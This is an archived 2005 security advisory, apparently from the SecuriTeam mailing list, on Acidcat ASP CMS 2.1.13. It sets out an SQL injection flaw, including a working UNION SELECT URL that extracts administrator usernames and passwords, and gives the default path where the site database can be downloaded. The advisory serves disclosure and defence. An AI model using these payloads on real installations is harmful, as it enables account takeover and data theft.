Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[UNIX] Acidcat ASP CMS Multiple Vulnerabilities

Subject: [UNIX] Acidcat ASP CMS Multiple Vulnerabilities
Date: 19 Dec 2005 18:51:18 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Acidcat ASP CMS Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

 <http://www.acidcat.com> Acidcat CMS is "a web site and simple content 
management system that can be administered via a web browser". Multiple 
security vulnerabilities have been discovered in Acidcat ASP allowing 
remote attackers to bypass the authentication mechanism by exploiting an 
SQL injection, and to download the product's database by requesting its 
download.

DETAILS

Vulnerable Systems:
 * Acidcat CMS version 2.1.13

The following URL can be used to trigger an SQL injection vulnerability in 
the main_content.asp page:
http://localhost/acidcat/default.asp?ID=1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) 
in query expression 'ID = 1'''.
/main_content.asp, line 16 

Vulnerable Code:
The following lines in main_content.asp:
Item.Source = "SELECT * FROM Item WHERE ID = "+ 
Item__MMColParam.replace(/'/g, "''") + "";

Exploit:
The following URL will illustrate how you can easily find administrator 
username and password  by entering the following URL:
http://localhost/acidcat/default.asp?ID=26 union select 
1,username,3,password,5,6 from Configuration

The path of the login page is:
http://localhost/acidcat/main_login.asp

Database Download:
The database can be downloaded over the web (default installation). It can 
be found under: http://localhost/acidcat/databases/acidcat.mdb


ADDITIONAL INFORMATION

The information has been provided by  <mailto:admin@hamid.ir> Hamid Ebadi 
(Hamid Network Security Team).
The original article can be found at:  
<http://hamid.ir/security/acidcat.txt> 
http://hamid.ir/security/acidcat.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Acidcat ASP CMS Multiple Vulnerabilities, SecuriTeam <=